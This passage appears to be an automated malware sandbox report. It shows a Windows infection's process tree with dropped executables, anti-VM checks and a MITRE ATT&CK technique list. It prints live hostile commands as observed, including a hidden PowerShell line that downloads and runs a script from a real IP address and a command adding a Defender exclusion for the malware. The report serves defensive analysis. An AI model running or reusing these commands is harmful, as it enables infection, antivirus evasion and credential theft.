        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4284,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8
        8⤵
        
        PID:4668
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4836,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4208 /prefetch:8
        8⤵
        
        PID:5344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:8
        8⤵
        
        PID:2148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4856,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4944 /prefetch:8
        8⤵
        
        PID:1200
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5004 /prefetch:8
        8⤵
        
        PID:5272
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5116,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5332 /prefetch:8
        8⤵
        
        PID:5772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5468 /prefetch:8
        8⤵
        
        PID:5608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5416,i,3872285359977141442,16201365985614630900,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5168 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:5724
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 772
        6⤵
        Program crash
        
        PID:2820
    - - C:\Users\Admin\AppData\Local\Temp\10110050101\ce4pMzk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110050101\ce4pMzk.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:968
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\ologEXCB\Anubis.exe""
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5916
    - - C:\Users\Admin\AppData\Local\Temp\10110060101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110060101\MCxU5Fj.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3400
      - C:\Users\Admin\AppData\Local\Temp\10110060101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110060101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        
        PID:2204
      - C:\Users\Admin\AppData\Local\Temp\10110060101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110060101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5540
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 772
        6⤵
        Program crash
        
        PID:5592
    - - C:\Users\Admin\AppData\Local\Temp\10110070101\v6Oqdnc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110070101\v6Oqdnc.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:392
    - - C:\Users\Admin\AppData\Local\Temp\10110080101\PcAIvJ0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110080101\PcAIvJ0.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6136
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\BD7B.tmp\BD7C.bat C:\Users\Admin\AppData\Local\Temp\10110080101\PcAIvJ0.exe"
        6⤵
        
        PID:5612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:4672
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g5poicum\g5poicum.cmdline"
        9⤵
        
        PID:1456
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDCE9.tmp" "c:\Users\Admin\AppData\Local\Temp\g5poicum\CSCFC9F2421F5114CF893D1AC9A81F0FA5F.TMP"
        10⤵
        
        PID:5072
    - - C:\Users\Admin\AppData\Local\Temp\10110090101\zY9sqWs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110090101\zY9sqWs.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1380
    - - C:\Users\Admin\AppData\Local\Temp\10110100101\e1f68e263b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110100101\e1f68e263b.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5944

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3040

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3436

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5384

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2068

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:5368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5816 -ip 5816
1⤵
PID:5992

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3400 -ip 3400
1⤵
PID:5060

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Authentication Process

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion